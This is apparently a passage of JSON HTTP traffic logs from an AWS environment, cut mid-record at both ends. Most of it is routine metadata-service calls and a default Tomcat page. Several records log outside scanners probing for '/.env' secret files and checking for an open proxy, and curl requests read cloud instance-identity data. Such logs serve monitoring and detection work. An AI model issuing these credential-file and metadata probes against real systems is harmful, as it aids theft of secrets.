Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n","src_ip":"185.254.196.218","src_mac":"02:A5:92:DA:49:85","src_port":47600,"time_taken":199092,"transport":"tcp","uri":"/.env","uri_path":"/.env"} {"endtime":"2022-04-06T06:25:01.112730Z","timestamp":"2022-04-06T06:25:01.112306Z","bytes":499,"bytes_in":121,"bytes_out":378,"dest_content":"SJbzdRr80NsieoIUzvUXc16UlC0v2GOxNQJ3+rTw9JN/Ctzr4iQJren54UAbdS2wjxZO77rrcNow\nav1OgeIjXi9xVwIRvR4+gRhFg3o7kO6oqqP+ewG3I3cNO3TgTKtSyURKBYOVWcXDiAxYPnhlQpJ6\npI8t0zAvXxXnHvaFZlA=","dest_headers":"HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 05:22:04 GMT\r\nContent-Length: 174\r\nDate: Wed, 06 Apr 2022 06:25:01 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":174,"flow_id":"cddac5c1-4750-485c-8399-a83902511d01","http_comment":"HTTP/1.1 200 OK","http_content_length":174,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"curl/7.58.0","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/dynamic/instance-identity/signature HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/dynamic/instance-identity/signature HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: curl/7.58.0\r\nAccept: */*\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":36118,"status":200,"time_taken":442,"transport":"tcp","uri":"/latest/dynamic/instance-identity/signature","uri_path":"/latest/dynamic/instance-identity/signature"} {"endtime":"2022-04-06T06:25:01.103024Z","timestamp":"2022-04-06T06:25:01.102469Z","bytes":824,"bytes_in":120,"bytes_out":704,"dest_content":"{\n \"accountId\" : \"111111111111\",\n \"architecture\" : \"x86_64\",\n \"availabilityZone\" : \"us-west-2a\",\n \"billingProducts\" : null,\n \"devpayProductCodes\" : null,\n \"marketplaceProductCodes\" : [ \"dr74u1i47lei9pk3agsx35e62\" ],\n \"imageId\" : \"ami-08be78facc5080f5e\",\n \"instanceId\" : \"i-028267a8b395850b7\",\n \"instanceType\" : \"t3.small\",\n \"kernelId\" : null,\n \"pendingTime\" : \"2022-04-05T15:35:44Z\",\n \"privateIp\" : \"10.0.1.21\",\n \"ramdiskId\" : null,\n \"region\" : \"us-west-2\",\n \"version\" : \"2017-09-30\"\n}","dest_headers":"HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 05:22:04 GMT\r\nContent-Length: 500\r\nDate: Wed, 06 Apr 2022 06:25:01 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":500,"flow_id":"77f64aeb-25ee-4b4a-bbcc-36d3fc2ea792","http_comment":"HTTP/1.1 200 OK","http_content_length":500,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"curl/7.58.0","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/dynamic/instance-identity/document HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/dynamic/instance-identity/document HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: curl/7.58.0\r\nAccept: */*\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":36116,"status":200,"time_taken":577,"transport":"tcp","uri":"/latest/dynamic/instance-identity/document","uri_path":"/latest/dynamic/instance-identity/document"} {"endtime":"2022-04-06T06:11:42.456042Z","timestamp":"2022-04-06T06:11:42.455815Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 14400\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 06:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"c3808dd9-69af-498e-a6e6-543d557db823","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAB12_4PBJX-o-ftn-_f9xIVD_faETOwzsl8VDycCsRSP6rxrdw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":35804,"status":404,"time_taken":243,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T06:11:42.451969Z","timestamp":"2022-04-06T06:11:42.451482Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 14400\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 05:22:04 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 06:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"0a7ce5f1-f1d8-4648-a671-eb1efb82e646","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAB12_4PLkzzLMnWW7D_TYFoPfLWUWPa1EHDLmlPWnb2nn366jA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":35802,"status":200,"time_taken":504,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T06:02:06.084199Z","timestamp":"2022-04-06T06:02:06.083816Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 10800\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 06:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"75956ddb-f453-4cbb-af36-7488cb530ff4","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAKgN4ZhrrQ8W5dCXyKL9CaTPJUz7Gz0ab15Cxxjp9XhejBZXBQ==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":39784,"status":404,"time_taken":395,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T06:02:06.083279Z","timestamp":"2022-04-06T06:02:06.082708Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 10800\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 05:57:53 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 06:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"bd77253d-8db2-4845-8f44-ad4e0139759b","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAKgN4ZgoDIVBfMqbdCFJhTJHdyR-Sy3U3VUTV3n4MesvAPsm3Q==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":39782,"status":200,"time_taken":605,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T06:01:59.874059Z","timestamp":"2022-04-06T06:01:59.873874Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 10800\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 06:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"94afc23b-991f-4738-a949-c18e6485863d","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJiiicNb_rLsJH_e_wM2WDqJ6Kb_uTmcoC48PP6o6p7tyUHP9g==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":41556,"status":404,"time_taken":212,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T06:01:59.872866Z","timestamp":"2022-04-06T06:01:59.872608Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 10800\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 05:29:09 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 06:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"2678ba02-1a2d-4f34-8f8c-b63b18f96a8d","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJiiicOYLK24xTS3vdnCjFNF_QWAxJ9U3Vj2pnP7D-_zNg5jXQ==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":41554,"status":200,"time_taken":308,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T05:54:00.326798Z","timestamp":"2022-04-06T05:54:00.326798Z","bytes":180,"bytes_in":180,"bytes_out":0,"dest_ip":"10.0.1.12","dest_mac":"02:3E:49:33:B8:B5","dest_port":9997,"flow_id":"59023a5b-391e-43e4-a660-e9465df59018","http_method":"GET","http_user_agent":"NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"54.189.97.219:9997","src_headers":"GET / HTTP/1.1\r\nHost: 54.189.97.219:9997\r\nUser-Agent: NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com\r\n\r\n","src_ip":"185.173.35.53","src_mac":"02:A5:92:DA:49:85","src_port":51224,"time_taken":164307,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T05:45:02.315760Z","timestamp":"2022-04-06T05:45:02.314581Z","bytes":2280,"bytes_in":186,"bytes_out":2094,"dest_content":"\n\n\n\n Apache Tomcat\n\n\n\n

It works !

\n\n

If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!

\n \n

This is the default Tomcat home page. It can be found on the local filesystem at: /var/lib/tomcat9/webapps/ROOT/index.html

\n\n

Tomcat veterans might be pleased to learn that this system instance of Tomcat is installed with CATALINA_HOME in /usr/share/tomcat9 and CATALINA_BASE in /var/lib/tomcat9, following the rules from /usr/share/doc/tomcat9-common/RUNNING.txt.gz.

\n\n

You might consider installing the following packages, if you haven't already done so:

\n\n

tomcat9-docs: This package installs a web application that allows to browse the Tomcat 9 documentation locally. Once installed, you can access it by clicking here.

\n\n

tomcat9-examples: This package installs a web application that allows to access the Tomcat 9 Servlet and JSP examples. Once installed, you can access it by clicking here.

\n\n

tomcat9-admin: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the manager webapp and the host-manager webapp.

\n\n

NOTE: For security reasons, using the manager webapp is restricted to users with role \"manager-gui\". The host-manager webapp is restricted to users with role \"admin-gui\". Users are defined in /etc/tomcat9/tomcat-users.xml.

\n\n\n\n","dest_headers":"HTTP/1.1 200 \r\nAccept-Ranges: bytes\r\nETag: W/\"1895-1649171235548\"\r\nLast-Modified: Tue, 05 Apr 2022 15:07:15 GMT\r\nContent-Type: text/html\r\nContent-Length: 1895\r\nDate: Wed, 06 Apr 2022 05:45:01 GMT\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1895,"flow_id":"12d5da48-ec06-4031-b088-cc0eb84b5a5c","http_comment":"HTTP/1.1 200 ","http_content_length":1895,"http_content_type":"text/html","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"54.218.192.0:8080","src_headers":"GET / HTTP/1.1\r\nHost: 54.218.192.0:8080\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"118.123.105.85","src_mac":"02:A5:92:DA:49:85","src_port":58792,"status":200,"time_taken":211108,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T05:29:37.533071Z","timestamp":"2022-04-06T05:29:37.533071Z","bytes":231,"bytes_in":231,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"1c516b89-a1e0-4f47-b648-e8ed955bfa94","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET /.env HTTP/1.1","site":"35.84.123.246","src_headers":"GET /.env HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n","src_ip":"185.254.196.115","src_mac":"02:A5:92:DA:49:85","src_port":59658,"time_taken":171227,"transport":"tcp","uri":"/.env","uri_path":"/.env"} {"endtime":"2022-04-06T05:11:42.452394Z","timestamp":"2022-04-06T05:11:42.452012Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 18000\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 05:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"2d5bb883-efb9-4321-9beb-1b7783915b9c","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAB12_4PBJX-o-ftn-_f9xIVD_faETOwzsl8VDycCsRSP6rxrdw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":34400,"status":404,"time_taken":390,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T05:11:42.451574Z","timestamp":"2022-04-06T05:11:42.451035Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 18000\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 04:22:23 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 05:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"461bbe9d-0af4-45b1-b6f9-28a722599941","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAB12_4PLkzzLMnWW7D_TYFoPfLWUWPa1EHDLmlPWnb2nn366jA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":34398,"status":200,"time_taken":555,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T05:07:56.751776Z","timestamp":"2022-04-06T05:07:56.751776Z","bytes":231,"bytes_in":231,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"0717c365-3d08-4bff-9b16-ed9d88c2ba6a","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET /.env HTTP/1.1","site":"35.84.123.246","src_headers":"GET /.env HTTP/1.1\r\nHost: 35.84.123.246\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36\r\n\r\n","src_ip":"82.76.220.6","src_mac":"02:A5:92:DA:49:85","src_port":51766,"time_taken":199314,"transport":"tcp","uri":"/.env","uri_path":"/.env"} {"endtime":"2022-04-06T05:02:06.083070Z","timestamp":"2022-04-06T05:02:06.082543Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 14400\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 05:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"b33dfc65-b2c1-4580-9700-92a8171ae251","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAKgN4ZhrrQ8W5dCXyKL9CaTPJUz7Gz0ab15Cxxjp9XhejBZXBQ==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":42158,"status":404,"time_taken":562,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T05:02:06.082044Z","timestamp":"2022-04-06T05:02:06.081830Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 14400\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 04:57:12 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 05:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"7ab0b2b2-dcfd-47fc-b796-577e4a0be212","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAKgN4ZgoDIVBfMqbdCFJhTJHdyR-Sy3U3VUTV3n4MesvAPsm3Q==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":42156,"status":200,"time_taken":253,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T05:01:59.874295Z","timestamp":"2022-04-06T05:01:59.873933Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 14400\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 05:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"437dc73e-8009-4a69-8823-60ac7e08de23","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJiiicNb_rLsJH_e_wM2WDqJ6Kb_uTmcoC48PP6o6p7tyUHP9g==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":40146,"status":404,"time_taken":385,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T05:01:59.873152Z","timestamp":"2022-04-06T05:01:59.872700Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 14400\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 04:28:44 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 05:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"44e48fda-d295-4836-92e0-d7b1c1550c5a","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJiiicOYLK24xTS3vdnCjFNF_QWAxJ9U3Vj2pnP7D-_zNg5jXQ==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":40144,"status":200,"time_taken":502,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T04:57:36.610375Z","timestamp":"2022-04-06T04:57:36.610375Z","bytes":110,"bytes_in":110,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"8cc05e8a-eae0-4522-ac12-63ea4559cd2f","http_method":"GET","http_user_agent":"Go-http-client/1.1","protocol_stack":"ip:tcp:http","request":"GET http://example.com/ HTTP/1.1","site":"example.com","src_headers":"GET http://example.com/ HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"45.137.21.208","src_mac":"02:A5:92:DA:49:85","src_port":57778,"time_taken":166312,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T04:54:51.922376Z","timestamp":"2022-04-06T04:54:51.922245Z","bytes":331,"bytes_in":22,"bytes_out":309,"dest_content":"\r\n400 Bad Request\r\n\r\n

400 Bad Request

\r\n
nginx/1.21.5
